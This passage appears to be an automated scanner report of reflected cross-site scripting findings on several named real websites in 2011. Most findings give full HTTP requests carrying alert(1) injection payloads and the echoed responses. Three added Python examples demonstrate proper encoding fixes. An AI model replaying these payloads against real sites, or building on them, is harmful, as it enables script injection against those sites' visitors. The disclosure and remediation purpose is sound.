The value of the rl_key request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8861"><script>alert(1)</script>1103dfbaf was submitted in the rl_key parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0b8861"><script>alert(1)</script>1103dfbaf&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:12:13 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7d45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:41:05 GMT;path=/;httponly
Content-Length: 2863
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the rl_track_landing_pages request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd298"><script>alert(1)</script>b6146d9bf2b was submitted in the rl_track_landing_pages parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1fd298"><script>alert(1)</script>b6146d9bf2b HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:13:11 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7845525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:42:03 GMT;path=/;httponly
Content-Length: 2867
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the scid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c936"><script>alert(1)</script>e5cf5050a89 was submitted in the scid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=17949717c936"><script>alert(1)</script>e5cf5050a89&cid=696829&tc=11020308002595319&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:11:11 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7b45525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:02 GMT;path=/;httponly
Content-Length: 2867
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the tc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41069"><script>alert(1)</script>db536dcf13f was submitted in the tc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /coupon/d544/544003/index5.html?scid=1794971&cid=696829&tc=1102030800259531941069"><script>alert(1)</script>db536dcf13f&rl_key=95f72aa00333e6f30e7f269538e0abb0&dynamic_proxy=1&primary_serv=gsbmtg1-px.rtrk.com&rl_track_landing_pages=1 HTTP/1.1
Host: gsbmtg.rtrk.com
Proxy-Connection: keep-alive
Referer: http://gsbmtg.rtrk.com/?scid=1794971
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D1794971%26cid%3D696829%26tc%3D11020308002595319; RlocalHilite=kw_hilite_off%3D0; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0; NSC_wt-vtb-susl-iuuq2=ffffffff096e1b7a45525d5f4f58455e445a4a423660
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:11:55 GMT
Server: Apache
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR"
Content-Type: text/html
Set-Cookie: NSC_wt-vtb-susl-iuuq=ffffffff096d1b7745525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 16:40:47 GMT;path=/;httponly
Content-Length: 2867
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
The value of the load request parameter is copied into the XML document as plain text between tags. The payload 5cf32<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>318d6c3ecd0 was submitted in the load parameter. This input was echoed as 5cf32<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>318d6c3ecd0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The value of the h request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74ac4'%3balert(1)//23282effb6e was submitted in the h parameter. This input was echoed as 74ac4';alert(1)//23282effb6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=7C8A652&w=300&h=25074ac4'%3balert(1)//23282effb6e&rnd=1219859 HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748882748&k=banks&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 384
Date: Thu, 03 Feb 2011 16:04:29 GMT
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://guru.sitescout.com/disp?pid=7C8A652&rand=" + myRand;
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8759f"%3balert(1)//240ee4185ab was submitted in the pid parameter. This input was echoed as 8759f";alert(1)//240ee4185ab in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=7C8A6528759f"%3balert(1)//240ee4185ab&w=300&h=250&rnd=1219859 HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748882748&k=banks&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 384
Date: Thu, 03 Feb 2011 16:04:28 GMT
Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://guru.sitescout.com/disp?pid=7C8A6528759f";alert(1)//240ee4185ab&rand=" + myRand;
The value of the w request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8e3b'%3balert(1)//7fbf4efe72 was submitted in the w parameter. This input was echoed as d8e3b';alert(1)//7fbf4efe72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag.jsp?pid=7C8A652&w=300d8e3b'%3balert(1)//7fbf4efe72&h=250&rnd=1219859 HTTP/1.1
Host: guru.sitescout.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.pp&pos=2&t=2&sz=300x250&ord=1296748882748&k=banks&l=Dallas%2c+TX
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
Content-Type: application/x-javascript
Content-Length: 383
Date: Thu, 03 Feb 2011 16:04:28 GMT
Connection: close
var myRand=parseInt(Math.random()*99999999);
var pUrl = "http://guru.sitescout.com/disp?pid=7C8A652&rand=" + myRand;
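The three tag.jsp findings above all place a query parameter inside a JavaScript string literal in a script served as application/x-javascript, so the attacker only has to close the literal (";" or ';'), append a statement, and comment out the remainder with //. The following Python example is added here and is not part of the scanner report or of the sitescout code: it emits a hypothetical version of that script, reconstructed from the two response lines the report shows, once with raw interpolation and once through a JavaScript-string encoder that hex-escapes every character outside [A-Za-z0-9], then runs a small string-literal tokenizer over each result to show which text would execute as code rather than sit inside the literal. The template and the function names are assumptions.

```python
# Payload from the report's pid finding (canary, closing quote, statement, comment).
PAYLOAD = '7C8A6528759f";alert(1)//240ee4185ab'


def js_string_encode(s: str) -> str:
    """Escape everything except [A-Za-z0-9] as \\xHH (or \\uHHHH above 0xFF).
    The value can then never terminate the literal, open a comment, or, if the
    script is later inlined in HTML, close a <script> element."""
    out = []
    for ch in s:
        code = ord(ch)
        if ch.isascii() and ch.isalnum():
            out.append(ch)
        elif code <= 0xFF:
            out.append("\\x%02x" % code)
        else:
            out.append("\\u%04x" % code)
    return "".join(out)


def render_tag_js(pid: str, safe: bool) -> str:
    """Hypothetical tag.jsp output, assumed from the two lines visible in the report."""
    value = js_string_encode(pid) if safe else pid
    return ('var myRand=parseInt(Math.random()*99999999);\n'
            'var pUrl = "http://guru.sitescout.com/disp?pid=%s&rand=" + myRand;\n' % value)


def code_outside_strings(js: str) -> str:
    """Drop string literals (honouring backslash escapes) and // line comments and
    return what remains: the characters a JavaScript engine would treat as code."""
    out, i, n = [], 0, len(js)
    while i < n:
        ch = js[i]
        if ch in ('"', "'"):
            quote = ch
            i += 1
            while i < n and js[i] != quote:
                i += 2 if js[i] == "\\" else 1    # an escaped character cannot close the literal
            i += 1                                # step over the closing quote
            out.append('""')
        elif js.startswith("//", i):              # only reached outside a literal
            i = js.find("\n", i)
            if i < 0:
                i = n
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def injected_call_executes(pid: str, safe: bool) -> bool:
    """True when alert(1) lands outside every string literal, i.e. it would run."""
    return "alert(1)" in code_outside_strings(render_tag_js(pid, safe))


if __name__ == "__main__":
    print("raw interpolation, alert(1) executes:", injected_call_executes(PAYLOAD, safe=False))
    print("encoded value,     alert(1) executes:", injected_call_executes(PAYLOAD, safe=True))
```

The encoder is deliberately stricter than quoting alone: escaping only the quote character would still let a value containing a newline or, in an inline script, the sequence </script> change the parse, which is why the remediation text above recommends avoiding the script context altogether where possible.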
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d33ef"><script>alert(1)</script>784ccd9e713 was submitted in the REST URL parameter 5. This input was echoed as d33ef\"><script>alert(1)</script>784ccd9e713 in the application's response. The backslash inserted before the quotation mark (the signature of addslashes-style escaping, which is aimed at SQL rather than HTML) provides no protection here: a backslash is not an escape character inside an HTML attribute value, so the double quote still terminates the attribute and the injected tag is parsed exactly as it would be without the backslash.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/trashed-h-b-house-on-good-morning-america/127042d33ef"><script>alert(1)</script>784ccd9e713/ HTTP/1.1
Host: huntingtonhomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:56 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64846
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... nate" type="application/rss+xml" title=" Page not found - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042d33ef\"><script>alert(1)</script>784ccd9e713/feed/" /> ...[SNIP]...
1.167. http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11603"><script>alert(1)</script>ec87b8f4492 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 11603\"><script>alert(1)</script>ec87b8f4492 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/02/trashed-h-b-house-on-good-morning-america/127042/?11603"><script>alert(1)</script>ec87b8f4492=1 HTTP/1.1
Host: huntingtonhomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php
Link: <http://huntingtonhomes.ocregister.com/?p=127042>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 130070
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... ashed H.B. house on ‘Good Morning America’ - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/02/trashed-h-b-house-on-good-morning-america/127042/?11603\"><script>alert(1)</script>ec87b8f4492=1feed/" /> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44602"><script>alert(1)</script>cd83832419c was submitted in the REST URL parameter 5. This input was echoed as 44602\"><script>alert(1)</script>cd83832419c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/repod-green-home-is-back-on-the-market/12710044602"><script>alert(1)</script>cd83832419c/ HTTP/1.1
Host: huntingtonhomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:06:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:06:12 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 64828
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org ...[SNIP]... ternate" type="application/rss+xml" title=" Page not found - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/12710044602\"><script>alert(1)</script>cd83832419c/feed/" /> ...[SNIP]...
1.169. http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/127100/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aba25"><script>alert(1)</script>01bcc28d4e8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aba25\"><script>alert(1)</script>01bcc28d4e8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/03/repod-green-home-is-back-on-the-market/127100/?aba25"><script>alert(1)</script>01bcc28d4e8=1 HTTP/1.1
Host: huntingtonhomes.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:06:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://huntingtonhomes.ocregister.com/xmlrpc.php
Link: <http://huntingtonhomes.ocregister.com/?p=127100>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 77988
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http: ...[SNIP]... po’d ‘green’ home is back on the market - Huntington Homes - www.ocregister.com" href="http://huntingtonhomes.ocregister.com/2011/02/03/repod-green-home-is-back-on-the-market/127100/?aba25\"><script>alert(1)</script>01bcc28d4e8=1feed/" /> ...[SNIP]...
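The two groups of attribute-context findings above, the gsbmtg.rtrk.com series in which the payload is echoed unmodified and the ocregister.com series in which it comes back as \" , differ only in the backslash, and an HTML parser ignores it. The following Python example is added here and is not part of the scanner report or of either site's code: it renders a hypothetical version of the <link rel="alternate"> tag seen in the ocregister responses three ways (raw, with PHP addslashes-style backslash escaping, and with entity encoding) and feeds each rendering to the standard-library HTML parser to see whether the injected <script> start tag materialises. The template, the host name and the function names are assumptions.

```python
from html import escape
from html.parser import HTMLParser

# Canary-wrapped payload of the kind the scanner submitted (copied from the report).
PAYLOAD = 'd33ef"><script>alert(1)</script>784ccd9e713'


def addslashes(s: str) -> str:
    """PHP addslashes()-style escaping: a backslash before quotes and backslashes.
    It targets SQL-like string syntax and means nothing to an HTML tokenizer."""
    return s.replace("\\", "\\\\").replace('"', '\\"').replace("'", "\\'")


def render_feed_link(slug: str, encoder) -> str:
    """Hypothetical template for the <link rel="alternate"> tag in the report:
    a URL path segment is placed inside a double-quoted href attribute."""
    return ('<link rel="alternate" type="application/rss+xml" '
            'href="http://example.invalid/2011/02/02/post/%s/feed/" />' % encoder(slug))


class StartTagRecorder(HTMLParser):
    """Records every start tag the parser creates, in document order."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def creates_script_element(markup: str) -> bool:
    """True if parsing the markup yields a <script> element."""
    parser = StartTagRecorder()
    parser.feed(markup)
    parser.close()
    return "script" in parser.tags


def attribute_context_results(payload: str = PAYLOAD) -> dict:
    """For each rendering strategy, whether the payload escapes the attribute."""
    return {
        "unmodified": creates_script_element(render_feed_link(payload, lambda s: s)),
        "addslashes": creates_script_element(render_feed_link(payload, addslashes)),
        "html_escape": creates_script_element(
            render_feed_link(payload, lambda s: escape(s, quote=True))),
    }


if __name__ == "__main__":
    for strategy, escaped_attribute in attribute_context_results().items():
        print(f"{strategy:12s} script element created: {escaped_attribute}")
```

escape(s, quote=True) converts the five characters that matter in this context (&, <, >, " and ') to entities, which is the remediation that applies to every attribute-context finding in this report regardless of whether the input arrives as a query value, a parameter name or a URL path segment.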
1.170. http://hurricane.accuweather.com/hurricane/index.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://hurricane.accuweather.com
Path: /hurricane/index.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 722b7"><script>alert(1)</script>9e1b639a6b3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hurricane/index.asp?722b7"><script>alert(1)</script>9e1b639a6b3=1 HTTP/1.1
Host: hurricane.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
Content-Type: text/html
Cache-Control: public, max-age=300
Expires: Thu, 03 Feb 2011 19:10:48 GMT
Date: Thu, 03 Feb 2011 19:05:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82496
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <a rel="nofollow" href="/hurricane/index.asp?722b7"><script>alert(1)</script>9e1b639a6b3=1&unit=f"> ...[SNIP]...
The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81137"><script>alert(1)</script>7e000d53a18 was submitted in the partner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hurricane/index.asp?partner=accuweather81137"><script>alert(1)</script>7e000d53a18 HTTP/1.1
Host: hurricane.accuweather.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
p3p: CP="NOI DSP COR ADMa DEVa TAIa PSAa PSDa IVAa IVDa CONi HISa OUR IND CNT"
Content-Type: text/html
Cache-Control: public, max-age=300
Expires: Thu, 03 Feb 2011 19:10:51 GMT
Date: Thu, 03 Feb 2011 19:05:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 82064
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> ...[SNIP]... <a rel="nofollow" href="/hurricane/index.asp?partner=accuweather81137"><script>alert(1)</script>7e000d53a18&unit=f"> ...[SNIP]...
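The two hurricane.accuweather.com findings above show the usual origin of the "name of an arbitrarily supplied request parameter" pattern: the page builds a self-referencing link (href="/hurricane/index.asp?...&unit=f") by copying the raw query string, so parameter names, not only values, end up inside the attribute. The Python example below is added here and is not part of the scanner report or of the accuweather code: it reproduces the pattern the response implies, then builds the same link by parsing the query into pairs, re-serialising it with percent-encoding, and entity-encoding the resulting attribute, and checks that the rebuilt link still carries the original parameters. The path, the unit parameter handling and the function names are assumptions.

```python
from html import escape
from urllib.parse import parse_qsl, urlencode

# Query string from the report's finding: the payload is the parameter *name*.
RAW_QUERY = '722b7"><script>alert(1)</script>9e1b639a6b3=1'
PATH = "/hurricane/index.asp"


def unit_link_vulnerable(path: str, raw_query: str) -> str:
    """Pattern implied by the report: the raw query string is concatenated into href."""
    return '<a rel="nofollow" href="%s?%s&unit=f">' % (path, raw_query)


def unit_link_safe(path: str, raw_query: str, unit: str = "f") -> str:
    """Parse, then re-serialise. urlencode() percent-encodes names and values, so
    quotes and angle brackets cannot survive into the URL; escape(quote=True) then
    handles the attribute context, which also covers the & separators."""
    params = [(k, v) for k, v in parse_qsl(raw_query, keep_blank_values=True)
              if k != "unit"]
    params.append(("unit", unit))
    href = "%s?%s" % (path, urlencode(params))
    return '<a rel="nofollow" href="%s">' % escape(href, quote=True)


def href_value(anchor_markup: str) -> str:
    """The href attribute as the markup literally delimits it (up to the next quote)."""
    start = anchor_markup.index('href="') + len('href="')
    return anchor_markup[start:anchor_markup.index('"', start)]


def safe_link_round_trips(raw_query: str = RAW_QUERY) -> bool:
    """The safe link must still deliver the original parameters once decoded."""
    markup = unit_link_safe(PATH, raw_query)
    query = href_value(markup).split("?", 1)[1].replace("&amp;", "&")
    decoded = dict(parse_qsl(query, keep_blank_values=True))
    original = dict(parse_qsl(raw_query, keep_blank_values=True))
    return all(decoded.get(k) == v for k, v in original.items()) and decoded["unit"] == "f"


if __name__ == "__main__":
    print(unit_link_vulnerable(PATH, RAW_QUERY))   # attribute ends after ?722b7
    print(unit_link_safe(PATH, RAW_QUERY))         # payload survives only percent-encoded
```

In the vulnerable rendering the attribute value ends at the first quote of the payload, exactly as the response snippet above shows; in the safe rendering the same payload is still present, but only as %22%3E%3Cscript%3E... inside the URL, so the browser's HTML parser never sees a tag.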
